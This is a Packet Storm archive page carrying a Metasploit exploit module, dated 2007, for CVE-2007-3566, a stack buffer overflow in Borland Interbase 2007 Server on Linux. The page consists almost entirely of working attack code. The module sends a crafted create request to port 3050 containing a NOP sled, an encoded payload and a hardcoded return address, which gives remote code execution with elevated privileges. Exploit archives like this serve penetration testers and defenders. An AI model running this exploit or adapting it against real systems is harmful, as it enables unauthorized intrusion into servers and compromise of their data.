what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

interbase_create.rb.txt

interbase_create.rb.txt
Posted Aug 8, 2007
Authored by Ramon de C Valle, Adriano Lima

This Metasploit module exploits a stack overflow in Borland Interbase 2007 by sending a specially crafted create request.

tags | exploit, overflow
advisories | CVE-2007-3566
SHA-256 | 3e86d3a39bb4d94d658211aedac9393c5ed438275012efe2be5e6a027d43a17a

interbase_create.rb.txt

Change Mirror Download
##
# $Id: interbase_create.rb 5068 2007-07-31 02:10:49Z ramon $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Linux::Misc::Interbase_Create < Msf::Exploit::Remote

include Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Borland Interbase 2007 Create Request Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Borland Interbase 2007
by sending a specially crafted create request.
},
'Version' => '$Revision: 5068 $',
'Author' =>
[
'Ramon de Carvalho Valle <ramon@risesecurity.org>',
'Adriano Lima <adriano@risesecurity.org>',
],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-13' ],
[ 'CVE', '2007-3566' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 120,
},
'Targets' =>
[
#
# /opt/interbase/bin/ibserver
#
# 804cbe4: 5e pop %esi
# 804cbe5: 5d pop %ebp
# 804cbe6: c3 ret
#

[ 'Linux - Borland Interbase 2007 Server Edition', { 'Ret' => 0x804cbe4 } ],
],
'DefaultTarget' => 0
))

register_options(
[
Opt::RPORT(3050)
],
self.class
)

end

def exploit

connect

# Create request
buf = [0x14].pack('N')

# Id
buf << [0x03].pack('N')

# Size
buf << [0x220].pack('N')

# It will return into this nop block
buf << make_nops(0x21c - payload.encoded.length)

# Payload
buf << payload.encoded

print_status("Payload encoded size is #{payload.encoded.length} bytes.")

# Target
buf << [target.ret].pack('V')

# Padding
buf << rand_text_english(32 * 1024)

sock.put(buf)

sleep(2)

handler

end

end

end

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close